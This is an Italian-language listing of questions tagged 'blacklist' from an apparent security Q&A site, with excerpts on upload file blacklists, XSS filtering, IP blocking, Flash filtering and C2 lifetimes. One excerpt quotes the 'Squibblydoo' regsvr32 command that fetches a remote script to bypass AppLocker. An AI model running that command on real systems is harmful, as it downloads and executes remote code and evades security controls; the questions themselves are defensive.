Domande con tag 'blacklist'

4
risposte

Creazione di una lista nera di tipi di file per proteggere l'applicazione PHP

Sto lavorando in un sistema PHP in cui l'utente può caricare file. Sto provando a proteggere il sistema da codici maligni, quindi sto pensando a un tipo di lista nera di file che devo bloccare dal caricamento. So che una lista bianca è mi...
posta 31.01.2016 - 19:55
5
risposte

Blacklisting vs whitelisting caratteri per prevenire XSS?

Ho letto della prevenzione dell'XSS su OWASP e altri canali di sicurezza. Dicono tutti che dovrei usare ESAPI o una libreria simile e fare il filtraggio degli input attraverso un approccio whitelist. Tuttavia, utilizzo un framework (Webobject...
posta 13.09.2012 - 18:30
2
risposte

Blacklisting IP address - quando dovremmo agire?

Sono responsabile della protezione di un ambiente AWS e sto notando vari attacchi di ricognizione contro l'ambiente. Abbiamo la possibilità di bloccare gli indirizzi IP nel nostro firewall, ma l'ambiente viene scansionato con attacchi diversi pi...
posta 30.11.2015 - 20:26
1
risposta

Come funziona esattamente questo bypass di AppLocker? ( “Squibblydoo”)

Ho letto su alcuni blog di un trucco chiamato "Squibblydoo", in cui il seguente comando può ignorare AppLocker di Windows: regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll Dove l'URL punta a un file di script che contiene un comando per a...
posta 05.04.2018 - 20:54
1
risposta

Come difendersi da un attacco DOS Black-Spoofed-IP?

Quindi ho implementato una lista nera IP per l'endpoint /login sul mio server. Se qualche IP non riesce ad accedere più di x numero di tentativi in x numero di minuti l'IP richiedente è nella lista nera per x numero di min...
posta 25.12.2015 - 02:20
1
risposta

Il flash di filtraggio è basato sul mimetype sufficiente per tenerlo fuori?

Dato che il flash è un vero caos per la sicurezza, ho avviato la blacklisting del nostro proxy bloccando qualsiasi contenuto con il tipo mime application/x-shockwave-flash che funziona abbastanza bene per quanto posso dire. Il proxy esegue...
posta 18.07.2016 - 23:28
2
risposte

Esistono statistiche conosciute delle password utilizzate durante gli attacchi con password brute force?

Ho letto un bel po 'di attacchi di forza bruta e mi chiedo se le password utilizzate in tali attacchi debbano essere mantenute in giro in modo da impedire in seguito ai miei utenti di avere quelle password, dal momento che quei sistemi di forza...
posta 13.01.2016 - 08:59
2
risposte

Rimuove il dominio dalle blacklist del filtro web

Un dominio con un passato a scacchi Lavoro in una società che ha acquistato un dominio .com circa un anno fa e ora utilizza questo dominio per il suo sito web e la sua posta elettronica. Tuttavia, il proprietario precedente aveva un sito (u...
posta 12.12.2017 - 20:53
1
risposta

Esistono pratiche standard per la protezione contro l'immissione di link dannosi in forma pubblica?

Un sito web su cui sto lavorando deve avere un modulo per consentire a qualsiasi visitatore di inviare una richiesta di informazioni su un servizio. L'utente non avrà bisogno di creare un account, e i dettagli di contatto sono solo parte del mod...
posta 17.05.2016 - 04:36
1
risposta

Qual è la durata di vita di un C2?

Ho lavorato sulla creazione di blacklist dinamiche, e una domanda che è venuta fuori è per quanto tempo le voci tipiche dovrebbero essere mantenute su una lista nera. Nell'interesse del capitale netto, ci dovrebbe essere ovviamente un punto in c...
posta 26.07.2016 - 20:02